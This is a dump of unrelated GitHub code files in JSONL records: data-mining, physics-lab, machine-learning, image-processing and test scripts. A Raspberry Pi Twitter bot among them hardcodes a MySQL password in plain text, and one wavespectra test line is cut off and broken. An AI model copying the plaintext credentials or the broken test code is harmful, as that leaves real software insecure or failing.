\"pySerial\"]\n)\n","repo_name":"meisben/easyEEZYbotARM","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"21"} +{"seq_id":"1626256031","text":"import sys\nimport gzip\n\nimport numpy as np\n\nrng = np.random.RandomState(0)\n\ndef say(s, stream=sys.stderr):\n stream.write(\"{}\".format(s))\n stream.flush()\n \ndef stop():\n sys.stdin.readline()\n \ndef assertion(cond):\n if not cond:\n raise Exception()\n \ndef load_embedding_iterator(filename, vocab=None, skip_head=True):\n line_idx = 0\n fopen = gzip.open if filename.endswith(\".gz\") else open\n with fopen(filename) as fin:\n for line in fin:\n line_idx += 1\n if skip_head and line_idx == 1:\n continue # skip head\n \n line = line.strip()\n if line:\n parts = line.split()\n word = parts[0]\n if vocab and word not in vocab: # skip useless vec\n continue\n \n vals = np.array([ float(x) for x in parts[1:] ])\n yield word, vals\n\ndef file_line_iterator(filename):\n with open(filename) as fin:\n for line in fin:\n yield line.strip()","repo_name":"yuanzh/aspect_adversarial","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"21"} +{"seq_id":"21862200671","text":"\"\"\"Testing the SpecArray accessor.\"\"\"\nimport os\nimport numpy as np\nimport xarray as xr\nimport pytest\n\nfrom wavespectra import SpecArray\n\n\nFILES_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), \"sample_files\")\n\n\n@pytest.fixture(scope=\"module\")\ndef dset():\n filename = os.path.join(FILES_DIR, \"wavespectra.nc\")\n _dset = xr.open_dataset(filename)\n yield _dset.efth\n\n\n@pytest.fixture(scope=\"module\")\ndef dset_full():\n filename = os.path.join(FILES_DIR, \"wavespectra.nc\")\n _dset = xr.open_dataset(filename)\n yield _dset\n\n\ndef test_accessor_attached(dset):\n assert hasattr(dset, \"spec\")\n\n\ndef test_repr(dset):\n assert \" 0\n\n\ndef test_wavelen(dset):\n shallow = dset.spec.wavelen(depth=10)\n deep = dset.spec.wavelen(depth=100)\n assert all(deep - shallow) > 0\n\n\ndef test_partition_has_spectral_coords(dset):\n ds = dset.isel(freq=0, dir=0, drop=True)\n with pytest.raises(ValueError):\n ds.spec.partition(None, None, None)\n\n\ndef test_partition_efth_wind_depth_have_same_nonspectral_coords(dset_full):\n dset = dset_full\n wsp_darr = dset.wspd\n wdir_darr = dset.wdir\n dep_darr = dset.dpt.isel(time=0, drop=True)\n with pytest.raises(ValueError):\n dset.spec.partition(wsp_darr=wsp_darr, wdir_darr=wdir_darr, dep_darr=dep_darr)\n\n\ndef test_stats(dset):\n hs1 = dset.spec.hs()\n hs2 = dset.spec.stats([\"hs\"]).hs\n assert hs1.values == pytest.approx(hs2.values)\n\n dset.spec.stats([\"hs\", \"tp\", \"dpm\"], names=[\"hs1\", \"tp1\", \"dpm1\"])\n dset.spec.stats({\"hs\": {}, \"crsd\": {\"theta\": 90}})\n with pytest.raises(ValueError):\n dset.spec.stats(\"hs\")\n with pytest.raises(ValueError):\n dset.spec.stats([\"hs\", \"tp\", \"dpm\"], names=[\"hs1\", \"tp1\"])\n with pytest.raises(ValueError):\n dset.spec.stats([\"stat_not_implemented\"])\n with pytest.raises(ValueError):\n dset.spec.stats([\"dd\"])\n","repo_name":"wavespectra/wavespectra","sub_path":"tests/test_specarray.py","file_name":"test_specarray.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"21"} +{"seq_id":"6591958467","text":"import math\nimport itertools\nfrom pyspark import SparkContext\nimport sys\nimport numpy as np\nimport pandas as pd\nimport collections\nimport bisect\nimport json\nclass FirstList(collections.UserList):\n def __lt__(self, other):\n return self[0].__lt__(other)\ndef get_item_dict(baskets):\n\t# Assign each item (artist_id) an integer to be used as index in the matrix\n\titem_dict = {}\n\tfor basket in baskets:\n\t\titems = basket[1] #basket[0] is user_id, basket[1] is a list of artist_id\n\t\tfor item in items:\n\t\t\tif item not in item_dict:\n\t\t\t\t#len(item_dict) is the size of dictionary\n\t\t\t\t#When adding the first item, it evaluates to 0, adding the second item, it evaluates to 1\n\t\t\t\t#So the range of assigned integers is [0, #items-1]\n\t\t\t\titem_dict[item] = len(item_dict)\n\treturn item_dict\ndef get_item_counter(baskets):\n\titem_counter = collections.Counter()\n\tfor basket in baskets:\n\t\titems = basket[1]\n\t\titem_counter.update(items)\n\treturn item_counter\n\ndef inverse_dict(d):\n\t# {key: value} will become {value: key}\n\treturn {v: k for k, v in d.items()}\n\ndef tuple_wrapper(s):\n\tif type(s) is not tuple:\n\t\ts = (s, )\n\treturn s\n\ndef get_possible_k(item_dict, k):\n\tpossible_k = {}\n\tfor pair in itertools.combinations(item_dict.keys(), 2):\n\t\tpair_set = set()\n\t\tfor i in range(2):\n\t\t\tpair_set = pair_set.union(tuple_wrapper(pair[i]))\n\t\tif len(pair_set) == k:\n\t\t\tpossible_k[frozenset(pair_set)] = [pair[0], pair[1]]\n\treturn possible_k\ndef tuple_list_method(baskets, support, item_dict=None, k=2):\n if item_dict is None:\n item_dict = get_item_dict(baskets)\n else:\n # Only used in Q3, Q4, Q5\n # item_dict has been computed -> it's aprior method. Filter baskets to remove infrequent items\n # When k=2, infrequent single items have been removed from baskets. When k>=3, item_dict won't include single items\n # baskets will be modified!\n if k == 2:\n for i in range(len(baskets)):\n basket = baskets[i]\n items = basket[1]\n items_filterd = [item for item in items if item in item_dict]\n baskets[i] = (basket[0], items_filterd)\n\n item_dict_inv = inverse_dict(item_dict)\n n = len(item_dict)\n\n # Only used in Q3, Q4, Q5\n if k >= 3:\n possible_k = get_possible_k(item_dict, k)\n\n tuples = [] # Storage space is allocated every time a new pair is occurred, similar to LinkedList\n\n # Key logic: Tuple List Method\n for basket in baskets:\n items = basket[1]\n for kpair in itertools.combinations(items, k):\n # kpair is a k element tuple, kpair[i] is item (string)\n if k >= 3:\n pair_set = frozenset(kpair)\n\n # Now kpair is a 2 element pair\n kpair = possible_k.get(pair_set, None)\n if kpair is None:\n continue\n\n i = item_dict[kpair[0]]\n j = item_dict[kpair[1]]\n\n if i > j:\n j, i = i, j\n\n # Convert 2D index to 1D index\n # idx don't have to be continuous in this case. The only thing we care is their relative order.\n # We could use simple C style index calculation, or continue using the index method in q1\n # idx = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)\n idx = i*n+j\n\n # Core idea: tuples are sorted in increasing order, so they could be efficiently located by binary search\n # Example: x = [1, 4, 12, 20, 30, 50] If we want to find the index of item 30 and manipulate it, it could be found efficiently by binary search. bisect.bisect_left(x, 30)\n # Binary search takes O(log(n)) time, much faster than traversing the list, which takes O(n).\n # This is the benefit of keeping the list sorted. When adding items, we want to keep it sorted, finding the insertion index also takes O(log(n)) time. bisect.bisect_left(x, 25)\n # Checkout https://docs.python.org/3.6/library/bisect.html\n insert_idx = bisect.bisect_left(tuples, idx)\n\n # The insertion index is at the end of the list, i.e. the new item is larger than all items in the list\n if insert_idx >= len(tuples):\n tuples.append(FirstList([idx, 1]))\n else:\n tp = tuples[insert_idx]\n\n # This pair is already in the tuple list. Increase it's count (second element) by 1\n if tp[0] == idx:\n tp[1] += 1\n else:\n # This pair is not yet in the tuple list. Add a new tuple, the format is: (1D index, count)\n tuples.insert(insert_idx, FirstList([idx, 1]))\n\n # Extract results\n frequent_itemset_list = []\n for tp in tuples:\n count = tp[1]\n\n # Convert 1D index to 2D index\n # If you use different indexing method, this also needs to be changed\n i = tp[0] // n\n j = tp[0] % n\n\n item_i = item_dict_inv[i]\n item_j = item_dict_inv[j]\n\n # This implementation is ready for k>=3\n item_all = set()\n for item in (item_i, item_j):\n item_all = item_all.union(tuple_wrapper(item))\n\n item_all = tuple(sorted(list(item_all)))\n\n # apply support threshold\n if count >= support:\n frequent_itemset_list.append((item_all, count))\n\n frequent_itemset_list = sorted(frequent_itemset_list, key=lambda x: [-x[1]] + list(x[0]))\n return frequent_itemset_list\n# Wrap in a function to be reused in Q3\ndef triangular_matrix_method(baskets, support, item_dict=None, k=2):\n\tif item_dict is None:\n\t\titem_dict = get_item_dict(baskets) #item -> integer\n\telse:\n\t\t# Only used in Q4, Q5\n\t\t# item_dict has been computed -> it's aprior method. Filter baskets to remove infrequent items\n\t\t# When k=2, infrequent single items have been removed from baskets. When k>=3, item_dict won't include single items\n\t\t# baskets will be modified!\n\t\tif k == 2:\n\t\t\tfor i in range(len(baskets)):\n\t\t\t\tbasket = baskets[i]\n\t\t\t\titems = basket[1]\n\t\t\t\titems_filterd = [item for item in items if item in item_dict]\n\t\t\t\tbaskets[i] = (basket[0], items_filterd)\n\n\titem_dict_inv = inverse_dict(item_dict) #integer -> item. Inverse dict will be used when printing results\n\tn = len(item_dict)\n\n\t# Only used in Q4, Q5\n\tif k >= 3:\n\t\tpossible_k = get_possible_k(item_dict, k)\n\n\t# Storage space is pre-allocated. Similiar to ArrayList\n\t# Convert 2D index to 1D index\n\t# Conversion logic: https://stackoverflow.com/questions/27086195/linear-index-upper-triangular-matrix\n\ttri_matrix = [0] * (n * (n-1) // 2) # n * (n-1) always be even for n >= 2, use true division to make it a int\n\n\t# Key logic: Upper Triangular Matrix Method\n\tfor basket in baskets:\n\t\t# Take a basket (user), iterate all items (artist)\n\t\titems = basket[1]\n\n\t\t# Checkout https://docs.python.org/3.6/library/itertools.html#itertools.combinations\n\t\t# Equivalent to a double loop, but more concise\n\t\tfor kpair in itertools.combinations(items, k):\n\t\t\t# kpair is a k element tuple, kpair[i] is item (string)\n\t\t\tif k >= 3:\n\t\t\t\tpair_set = frozenset(kpair)\n\n\t\t\t\t# Now kpair is a 2 element pair\n\t\t\t\tkpair = possible_k.get(pair_set, None)\n\t\t\t\tif kpair is None:\n\t\t\t\t\tcontinue\n\n\t\t\t# i, j is integer index\n\t\t\ti = item_dict[kpair[0]]\n\t\t\tj = item_dict[kpair[1]]\n\n\t\t\t# Keep sorted in upper triangular order\n\t\t\tif i > j:\n\t\t\t\tj, i = i, j\n\n\t\t\t# Convert 2D index to 1D index\n\t\t\tidx = int((n*(n-1)/2) - (n-i)*((n-i)-1)/2 + j - i - 1)\n\t\t\t# Increase count by 1\n\t\t\ttri_matrix[idx] += 1\n\n\t# Extract results\n\tfrequent_itemset_list = []\n\tfor idx in range(len(tri_matrix)):\n\t\t# Convert 1D index to 2D index\n\t\ti = int(n - 2 - math.floor(math.sqrt(-8*idx + 4*n*(n-1)-7)/2.0 - 0.5))\n\t\tj = int(idx + i + 1 - n*(n-1)/2 + (n-i)*((n-i)-1)/2)\n\n\t\tcount = tri_matrix[idx]\n\t\titem_i = item_dict_inv[i]\n\t\titem_j = item_dict_inv[j]\n\n\t\t# Keep sorted in ascii order. item_i, item_j are strings or tuple of strings\n\t\t# This implementation is ready for k>=3\n\t\titem_all = set()\n\t\tfor item in (item_i, item_j):\n\t\t\titem_all = item_all.union(tuple_wrapper(item))\n\n\t\titem_all = tuple(sorted(list(item_all)))\n\n\t\t# apply support threshold\n\t\tif count >= support:\n\t\t\tfrequent_itemset_list.append((item_all, count))\n\n\t# First sorted by the occurrence count in decreasing order\n\t# Then sort by ascii order of the first item, in ascending order\n\t# Then sort by ascii order of the second item, in ascending order\n\tfrequent_itemset_list = sorted(frequent_itemset_list, key=lambda x: [-x[1]] + list(x[0]))\n\treturn frequent_itemset_list\n\ndef get_dict_from_frequent(frequent_list):\n\titem_dict = {}\n\tfor item in frequent_list:\n\t\titem_dict[item] = len(item_dict)\n\treturn item_dict\n\ndef aprior_all_method(baskets, support, method, son=False, total_baskets=0):\n\t# Used by Q5: SON\n\tif type(baskets) is not list:\n\t\tbaskets = list(baskets) #baskets are list now\n\tif son:\n\t\tsupport = math.floor(support*len(baskets)/total_baskets)\n\t\n\n\titem_counter = get_item_counter(baskets)\n\titemsets_1 = sorted([(k, v) for k, v in item_counter.items() if v >= support], key=lambda x: x[1], reverse=True)\n\tfrequent_1 = [x[0] for x in itemsets_1]\n\n\titemsets_list = [itemsets_1]\n\tfrequent_list = frequent_1\n\tfrequent_last = frequent_1\n\n\tk = 2\n\tmax_k = frequent_1[-1]\n\twhile True:\n\t\t# get a dictionary of current frequent items\n\t\t# Note: only frequent item pairs from the last pass is needed\n\t\titem_dict = get_dict_from_frequent(frequent_last)\n\n\t\t# baskets will be modfied!\n\t\titemsets = method(baskets, support, item_dict, k=k)\n\t\tif len(itemsets) > 0:\n\t\t\tfrequent_last = [x[0] for x in itemsets]\n\t\t\tfrequent_list += frequent_last\n\t\t\titemsets_list.append(itemsets)\n\t\t\tk += 1\n\t\telse:\n\t\t\tbreak \n\t\tif len(frequent_last)<=1:\n\t\t\tbreak\n\treturn itemsets_list, frequent_list\ndef get_dict_from_frequentitem(itemsets_list):\n\titemsets_dict = {}\n\tfor size in itemsets_list:\n\t\tfor item in size:\n\t\t\tif type(item[0]) is not tuple:\n\t\t\t\titemsets_dict[tuple_wrapper(item[0])] = item[1]\n\t\t\telse:\n\t\t\t\titemsets_dict[item[0]] = item[1]\n\t\n\treturn itemsets_dict\n\ndef print_all_frequent_itemsets(itemsets_list):\n\tn_itemsets = len(itemsets_list)\n\tfor i in range(n_itemsets-1, -1, -1):\n\t\tprint(f'Frequent itemsets of size: {i+1}')\n\t\tprint_frequent_itemsets(itemsets_list[i])\ndef print_frequent_itemsets(itemsets):\n\tfor frequent_itemset in itemsets:\n\t\tprint(frequent_itemset)\n\n\tprint(f'Total: {len(itemsets)}')\n\nif __name__ == '__main__':\n\tfilename = sys.argv[1]\n\toutput = sys.argv[2]\n\tinterest = float(sys.argv[3])\n\tsupport = int(sys.argv[4])\n\tratings = pd.read_csv(filename, encoding = 'utf8')\n\trating_filter = ratings[ratings['rating'] ==5]\n\tbasket_name = None\n\tbasket = []\n\tbaskets = []\n\tfor index,row in rating_filter.iterrows():\n\t\tuser_id, movie_id = int(row.userId), int(row.movieId)\n\t\tif user_id != basket_name:\n\t\t\tif basket_name is not None:\n\t\t\t\tbaskets.append((basket_name, basket))\n\t\t\tbasket = [movie_id]\n\t\t\tbasket_name = user_id\n\t\telse:\n\t\t\tbasket.append(movie_id)\n\tbaskets.append((basket_name, basket)) \n\t#print(baskets)\n\ttotal_baskets = len(baskets)\n\titemsets_list, frequent_list = aprior_all_method(baskets, support, tuple_list_method, True, total_baskets)\n\t#print(itemsets_list)\n\t#item_counter = get_item_counter(baskets)\n\t#itemsets_1 = sorted([(k, v) for k, v in item_counter.items() if v >= support], key=lambda x: x[1], reverse=True)\n\t#frequent_1 = [x[0] for x in itemsets_1]\n\t#frequent_list = frequent_1\n\titemsets_dict = get_dict_from_frequentitem(itemsets_list)\n\tanswers = []\n\t#print(frequent_list)\n\tfor pair in itertools.combinations(frequent_list,2):\n\t\tpair = list(pair)\n\t\tif type(pair[0]) is not tuple:\n\t\t\tpair[0] = tuple_wrapper(pair[0])\n\t\tif type(pair[1]) is not tuple:\n\t\t\tpair[1] = tuple_wrapper(pair[1])\n\t\tif abs(len(pair[0]) - len(pair[1]))== 1:\n\t\t\tif len(pair[0])>len(pair[1]):\n\t\t\t\ta = pair[0]\n\t\t\t\tb = pair[1]\n\t\t\telse:\n\t\t\t\ta = pair[1]\n\t\t\t\tb = pair[0]\n\t\t\tif set(b).issubset(set(a)):\n\t\t\t\tmovie_j = list(set(a) - set(b))[0]\n\t\t\t\tinterests = itemsets_dict[a]/itemsets_dict[b] - itemsets_dict[tuple_wrapper(movie_j)]/total_baskets\n\t\t\t\tif interests>= interest:\n\t\t\t\t\tassociate = sorted(list(set(b)))\n\t\t\t\t\tanswer = [associate, movie_j,interests ,itemsets_dict[a]]\n\t\t\t\t\tanswers.append(answer)\n\tanswers_sorted = sorted(answers, key=lambda x: (-abs(x[2]), -x[3], x[0], x[1]))\n\t#print(answers_sorted)\n\n\twith open(output,'w') as f:\n\t\tjson.dump(answers_sorted,f)\n\n\t\n","repo_name":"YiqunGan/Big-data-mining-with-Python-and-Spark","sub_path":"Big data mining with Python and Spark/yiqun_gan_hw2/yiqun_gan_task1.py","file_name":"yiqun_gan_task1.py","file_ext":"py","file_size_in_byte":12296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17245652269","text":"# This program was written by Brendan Halliday\n# for Lab 4 Question 3 part c which asks to\n# answer exercise 6.13 parts a and b from\n# 'Computational Physics' by Mark Newman \n# This program defines a binary search function and\n# uses it to solve the non linear equation\n# derived from the blackbody equation\n\nimport numpy as np\nfrom numpy.core.numeric import count_nonzero\nfrom scipy import constants\nimport Lab04_Q3_a as q3a\nimport matplotlib.pyplot as plt\n\n# Define helper functions\ndef f(x):\n \"\"\"\n Define the nonlinear equation \n under question.\n \"\"\"\n\n return 5 * np.exp(-x) + x - 5\n\ndef f_0(x):\n \"\"\"\n This function is to be used for \n relaxation method for x = g(x) where\n x = x and g(x) = 5 - 5 * np.exp(-x)\n \"\"\"\n return 5 - 5 * np.exp(-x)\n\ndef f_prime(x):\n \"\"\"\n This function is the analytical derivative\n of f(x) for each value x\n \"\"\"\n return 1 - 5 * np.exp(-x) \n\ndef binary_search(f, x_1, x_2, threshold):\n \"\"\"\n This function uses binary search to\n approximate the zero of a nonlinear equation\n \"\"\"\n dx = x_2 - x_1\n i = 0\n while dx > threshold:\n i = i + 1\n x_mid = (x_2 - x_1)/2 + x_1\n if np.sign(f(x_2)) != np.sign(f(x_mid)):\n x_1 = x_mid\n x_2 = x_2\n elif np.sign(f(x_1)) != np.sign(f(x_mid)):\n x_1 = x_1\n x_2 = x_mid\n else:\n print(\"Choose x_1 and x_2 on opposite sides of the zero\")\n dx = x_2 - x_1\n return [x_mid, i]\n\n\n\ndef newtons_method(f, f_prime, x, threshold):\n \"\"\"\n This function uses Newton's Method\n to approximate the zero of the function\n \"\"\"\n dx = 1\n i = 0\n while dx > threshold:\n i = i + 1\n xp = x - (f(x)/f_prime(x))\n dx = abs(xp - x)\n x = xp\n return i\n\ndef relax_count(f, threshold, x, dx):\n \"\"\"\n This function calculates the number\n of iterations required for the relaxation\n mehtod to converge to a the true answer within\n a given threshold.\n \"\"\"\n x_list = [x]\n i = 0\n while dx > threshold:\n x_list.append(f(x_list[-1]))\n dx = np.abs(x_list[-1]-x_list[-2])\n i += 1\n return i\n\n\nif __name__ == \"__main__\":\n\n threshold = 1e-6\n x_2 = 10\n x_1 = 1\n x_b = binary_search(f, x_1, x_2, threshold)[0]\n \n \n\n print(\"The zero is locates at: \")\n print(\"x = \", x_b)\n\n # displacemetn constant\n h = constants.Planck\n k = constants.Boltzmann\n c = constants.speed_of_light\n b = (c * h) / (k * x_b)\n print(\"Wien Displacement Constant is: \")\n print(\"b = \", b)\n\n # Part c\n # define lambda from the sun\n LAMBDA = 502e-9\n T = b / LAMBDA\n\n print(\"The temperature of the sun is estimated to be: \")\n print(T, \" K\")\n\n # this next part calculates the number of iterations it takes \n # each method to converge on the true value\n # it then plots number of iterations as a function of initial guess x\n count_b = []\n \n count_n = []\n \n count_r = []\n \n X = np.linspace(5, 50,100)\n plt.figure(1)\n\n\n\n for i in X:\n count_b.append(binary_search(f, x_1, i, threshold)[1])\n \n count_n.append(newtons_method(f, f_prime,i, threshold))\n \n count_r.append(relax_count(f_0, threshold, i, 1.0))\n\n \n plt.plot(X, count_b, label=\"Binary\")\n plt.plot(X, count_n, label=\"Newton\")\n plt.plot(X, count_r, label=\"Relaxation\")\n\n plt.xlabel('Choices for initial x')\n plt.ylabel('Number of iterations')\n plt.title('Iteration comparison between Newtons Method, Binary Search and Relaxation')\n plt.grid()\n plt.xlim(5,50)\n plt.legend()\n plt.savefig('Lab4_Q3c.png', dpi=300)\n plt.show()\n \n\n\n\n\n\n","repo_name":"brendanhalliday/Computational-Physics","sub_path":"LABS/Lab4/Lab04_Q3_c.py","file_name":"Lab04_Q3_c.py","file_ext":"py","file_size_in_byte":3691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39412435957","text":"import os\nimport simfin as sf\n\nfrom utils.logger import get_logger\n\nlogger = get_logger(__name__)\n\nsf.set_api_key(api_key=os.getenv('SIMFIN_KEY'))\n\n\ndef get_financial_markets(data_dir: str='data'):\n logger.info(\"Loading a list of the financial markets\")\n sf.set_data_dir(data_dir)\n markets_df = sf.load_markets()\n return {val: key for key, val in markets_df['Market Name'].items()}\n","repo_name":"TomM25/value_screener","sub_path":"get_financial_markets.py","file_name":"get_financial_markets.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4699285135","text":"import sys\nfrom twython import Twython\nimport os\nimport datetime\nimport MySQLdb\n\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\nACCESS_KEY = ''\nACCESS_SECRET = ''\n\napi = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET)\n\ntask = status=sys.argv[1]\nmessage = status=sys.argv[2]\n\n# Open database connection\ndb = MySQLdb.connect(\"localhost\",\"danny\",\"danny123\",\"MYGARDEN\" )\n# prepare a cursor object using cursor() method\ncursor = db.cursor()\nvWeatherAPITempData = \"404 error \";\nvTempsensor2 = \"404 error \";\nvWeatherAPIWeatherData = \"404 error \";\n\n\nif (task == 'CPU'):\n cmd = '/opt/vc/bin/vcgencmd measure_temp'\n line = os.popen(cmd).readline().strip()\n temp = line.split('=')[1].split(\"'\")[0]\n api.update_status(status='Dannyspi2.local CPU temperature is '+temp+' C - '+str(datetime.datetime.now()))\nif (task == 'message'):\n api.update_status(status=message+' - '+str(datetime.datetime.now()))\nif (task =='chart1'):\n photo = open('/var/www/Graph1.png','rb')\n api.update_status_with_media(media=photo, status='Outside Temp Chart - '+str(datetime.datetime.now()))\nif (task =='chart2'):\n photo = open('/var/www/Graph2.png','rb')\n api.update_status_with_media(media=photo, status='Inside Temp Chart - '+str(datetime.datetime.now()))\nif (task =='chart3'):\n photo = open('/var/www/Graph3.png','rb')\n api.update_status_with_media(media=photo, status='Outside Temp Chart all time -- '+str(datetime.datetime.now()))\nif (task =='chart4'):\n photo = open('/var/www/Graph4.png','rb')\n api.update_status_with_media(media=photo, status='Inside Temp Chart all time -- '+str(datetime.datetime.now()))\nif (task == 'temp'):\n cursor.execute(\"select SaveData from ControlLog where RunNumberId = (select max(RunNumberId) from RunNumber) and ActionName = 'temp sensor 2' ;\" )\n for row in cursor.fetchall():\n\n vTempsensor2 = (row[0])\n\n api.update_status(status='Internal Temp - '+str(vTempsensor2)+'C -- '+str(datetime.datetime.now()))\n\n cursor.execute(\"select SaveData from ControlLog where RunNumberId = (select max(RunNumberId) from RunNumber) and ActionName = 'Weather API' and LogDescription = 'Weather' ;\" )\n for row in cursor.fetchall():\n\n vWeatherAPIWeatherData = (row[0])\n\n cursor.execute(\"select SaveData from ControlLog where RunNumberId = (select max(RunNumberId) from RunNumber) and ActionName = 'Weather API' and LogDescription = 'Temp String' ;\" )\n for row in cursor.fetchall():\n\n vWeatherAPITempData = (row[0])\n\n api.update_status(status='API - Temp - '+str(vWeatherAPITempData)+' -- Weather -'+ vWeatherAPIWeatherData +' -- '+str(datetime.datetime.now()))\n","repo_name":"dprior1985/Tweet","sub_path":"SillyTweet.py","file_name":"SillyTweet.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18207685032","text":"class Solution:\n def findMaxAverage(self, nums: List[int], k: int) -> float:\n kErr = 1e-5\n l = min(nums)\n r = max(nums)\n\n # Returns true if there's a subarray with length >= k and average sum >= m.\n def check(m: float) -> bool:\n summ = 0\n prevSum = 0\n minPrevSum = 0\n\n for i, num in enumerate(nums):\n # -m for each num so that we can check if the sum of the subarray >= 0\n summ += num - m\n if i >= k:\n prevSum += nums[i - k] - m\n minPrevSum = min(minPrevSum, prevSum)\n # If sum - minPrevSum >= 0,\n # we know there's a subarray with length >= k and average sum >= m\n if i + 1 >= k and summ >= minPrevSum:\n return True\n\n return False\n\n while r - l > kErr:\n m = (l + r) / 2\n if check(m):\n l = m\n else:\n r = m\n\n return l\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0644. Maximum Average Subarray II/0644.py","file_name":"0644.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"1273389995","text":"from collections import OrderedDict\n\nimport torch\nimport torch.nn.parallel\n# from apex.optimizers.fused_lamb import FusedLAMB\nfrom timm.utils.distributed import reduce_tensor\nfrom torch.cuda.amp import autocast\nfrom tqdm import tqdm\n\nfrom utils import ioutils\nfrom utils.misc import AverageMeter\nfrom utils.misc import MetricLogger\n\n\ndef train_epoch(C_, args, epoch, model, loader, optimizer,\n lr_scheduler, criterion, loss_scaler, mixup_fn, wandb):\n if args.local_rank == 0 and C_.LOG_LEVEL >= 2:\n pbar = tqdm(total=len(loader))\n pbar.set_description('Ep:{:03d}'.format(epoch))\n\n num_updates = (epoch-1) * len(loader)\n\n loss_meter_s = AverageMeter()\n train_acc_meter_s = AverageMeter()\n loss_meter_l = AverageMeter()\n train_acc_meter_l = AverageMeter()\n metric_logger = MetricLogger(delimiter=' ')\n\n if C_.LOG_LEVEL >= 3:\n header = 'Epoch: [{}/{}]'.format(epoch, C_.MAX_EPOCHS)\n iterator = enumerate(metric_logger.log_every(loader, C_.LOG_INTERVAL, header))\n else:\n iterator = enumerate(loader)\n\n for batch_idx, batch in iterator:\n img, tgt = batch\n img = img.cuda(non_blocking=True)\n tgt = tgt.cuda(non_blocking=True)\n if mixup_fn is not None:\n img, tgt_tr = mixup_fn(img, tgt)\n else:\n tgt_tr = tgt\n\n optimizer.zero_grad(set_to_none=True)\n\n with autocast():\n logits = model(img)\n loss = criterion(logits, tgt_tr)\n curr_train_acc = (logits.argmax(dim=1) == tgt).sum()/float(len(tgt))\n\n loss_scaler(\n loss, optimizer,\n clip_grad=C_.GRAD_CLIP, clip_mode='norm',\n parameters=model.parameters(),\n create_graph=False)\n\n num_updates += 1\n\n lr_scheduler.step_update(num_updates)\n\n # NOTE: uncomment below to use warmup in steps but decay in epochs\n # if num_updates == C_.WARMUP_STEPS:\n # lr_scheduler.t_initial = lr_scheduler.t_initial//len(loader)\n # lr_scheduler.warmup_t = lr_scheduler.warmup_t//len(loader)\n # lr_scheduler.t_in_epochs = True\n\n if args.distributed:\n reduced_loss = reduce_tensor(loss.data, args.world_size)\n reduced_train_acc = reduce_tensor(curr_train_acc.data, args.world_size)\n else:\n reduced_loss = loss\n reduced_train_acc = curr_train_acc\n\n loss_meter_s.update(reduced_loss.item(), len(tgt))\n train_acc_meter_s.update(reduced_train_acc.item(), len(tgt))\n loss_meter_l.update(reduced_loss.item(), len(tgt))\n train_acc_meter_l.update(reduced_train_acc.item(), len(tgt))\n\n torch.cuda.synchronize()\n\n if args.local_rank == 0:\n if (batch_idx + 1) % C_.LOG_INTERVAL == 0:\n lrl = [param_group['lr'] for param_group in optimizer.param_groups]\n lr = sum(lrl) / len(lrl)\n log_dict = OrderedDict({\n 'Loss' : loss_meter_s.avg,\n 'Train Acc' : 100. * train_acc_meter_s.avg,\n 'LR' : lr\n })\n if C_.LOG_LEVEL >= 2:\n pbar.set_description(\n 'Ep:{:03d}, Loss:{:.4f}, Tr Acc:{:.2f}'.format(\n epoch, log_dict['Loss'], log_dict['Train Acc']),\n refresh=True)\n if args.rank == 0:\n wandb.log(log_dict)\n if C_.LOG_LEVEL == 4:\n log_str = ioutils.get_log_str(log_dict, title='Intra Epoch Log')\n print(log_str)\n loss_meter_s.reset()\n train_acc_meter_s.reset()\n\n if C_.LOG_LEVEL >= 2:\n pbar.update(1)\n\n lrl = [param_group['lr'] for param_group in optimizer.param_groups]\n lr = sum(lrl) / len(lrl)\n return OrderedDict({\n 'Epoch Lr' : ioutils.FormattedLogItem(lr, '{:.6f}'),\n 'Epoch Loss' : ioutils.FormattedLogItem(loss_meter_l.avg, '{:.6f}'),\n 'Epoch Train Acc' : ioutils.FormattedLogItem(100. * train_acc_meter_l.avg, '{:.2f}')\n })\n\n\n","repo_name":"samarth4149/task2sim","sub_path":"classifier/train_epoch.py","file_name":"train_epoch.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"21"} +{"seq_id":"27805946576","text":"'''\r\nDigital Image Processing\r\n16 April 2020\r\nby Sampada Petkar\r\n\r\nBitplane Slicing\r\n'''\r\n\r\nimport cv2 \r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nimg = cv2.imread('flower.jfif', 0) \r\nfig=plt.figure(figsize=(8, 8))\r\n\r\nfor k in range(0, 8):\r\n plane = np.full((img.shape[0], img.shape[1]), 2 ** k, np.uint8)\r\n res = cv2.bitwise_and(plane, img)\r\n x = res * 255\r\n ax = fig.add_subplot(3,3,k+2)\r\n ax.title.set_text(\"Plane \" + str(k+1))\r\n plt.imshow(x, cmap = \"gist_gray\")\r\n\r\nax1 = fig.add_subplot(3,3,1)\r\nax1.title.set_text(\"Input Image\")\r\nplt.imshow(img, cmap = \"gist_gray\")\r\n \r\nplt.show()\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","repo_name":"sampadap03/Digital-Signal-Processing","sub_path":"Digtal-Image-Processing/Bitplane Slicing.py","file_name":"Bitplane Slicing.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 